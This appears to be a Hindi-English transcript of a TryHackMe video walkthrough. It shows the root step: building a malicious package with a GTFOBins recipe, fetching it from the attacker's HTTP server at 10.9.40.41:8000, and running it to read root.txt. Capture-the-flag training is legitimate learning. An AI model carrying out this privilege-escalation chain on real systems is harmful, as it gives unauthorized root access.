अब इसके अंदर थोड़ा सा हम जो है ना इसको चेंज कर देंगे कमांड को। अब चूंकि आईडी कमांड हमने रन कर सकते हैं और ये हमें बता देगा कि दिस इज़ द आईडी ऑफ द यूज़र, रूट यूज़र की आईडी दिखा देगा, बट वी आर नॉट इंटरेस्टेड इन गेटिंग द आईडी ऑफ द रूट यूज़र। वी sort of already knew कि ये एज अ रूट यूज़र उसको रन कर देगा, so we'll simply get the root flag here. So we'll do /home /root.txt, क्योंकि यही उसके मेरे ख्याल से डायरेक्टरी है. Let's check this here. So we'll go to this J Jameson user SSH terminal here, and let's go to the root of the disk here and see what files we have in here. So here we have the root directory. तो इसी root directory के अंदर ही जो है इसका flag भी होगा. तो let's try to log in here, td here, लेकिन ये के permission is denied, so that's fine. So we'll go in here now, and then here we'll just copy, just do the command here, and let's do this, and let's follow the final instruction from GTFO bins here. So this way it will create the package for us. Paste this here, press enter. So now it has the package. So let's get this package to our अब क्योंकि ये जो है काली लिनक्स में है, and I am here on my Mac machine जो कि connected है TryHackMe के साथ. So let's get this package here first. So let me do the pwd here. So I will simply use scp command here. So I'll use scp and do then I will paste not this one. I will copy this link, this path here, and then the name of the package, and then I'll copy in the current directory here. यहाँ से थोड़ा सा टाइपो हो गया है, so I guess it is correct now. So now we have downloaded that file from the Kali machine here. So this is the file here. So let's rerun the Python server and get this file on the server. So we'll do python 3-m http.server, and that is there. Actually, let me list the file क्योंकि उसका नाम जो है थोड़ा सा अजीब सा है. So let me do this again. So now here on the J Jameson terminal, I will go to the temp directory again, clear the screen, and get that file. http://10.9.40.41 :8000/ and I have the package name here, right? So let's get this package here. अब ये package हमारे पास आ गया है. So we'll go to the GTFO bin, and ये जो दूसरा part इसमें है कि this is the command showing us how to run this package. So we'll copy this, and then let's go to the J Jameson terminal here, and let's paste this command here. और जैसे ही हमने ये command run करी, तो इसने ये जो आपको रनिंग ट्रांजैक्शन के अंदर नज़र आ रहा है, ये जो टेक्स्ट हमने उसको दिया था, कैट किया था हमने रूट फ्लैग, तो वो यहाँ पे हमें लिखा हुआ नज़र आ रहा है. तो we'll copy this, and then we'll go to the TryHackMe room here and paste the flag here and click on submit.
and that flag has been correct. तो अब इसके 2 टास्क हो गए हैं और इसका जो तीसरा टास्क है दैट इज़ जस्ट रीडिंग सम फोरम पोस्ट, और अगर आपको कोई नया तरीका मिल जाता है तो शेयर इट ऑन द फोरम. So that's fine, and we can mark this completed as well. And now we have completed the room. So this was it. Thanks for watching. I'll try to post more rooms in here. If you have any particular request for a particular room on Try Hack Me, let me know in the comments. And thanks again for watching. I'll see you guys in the next video.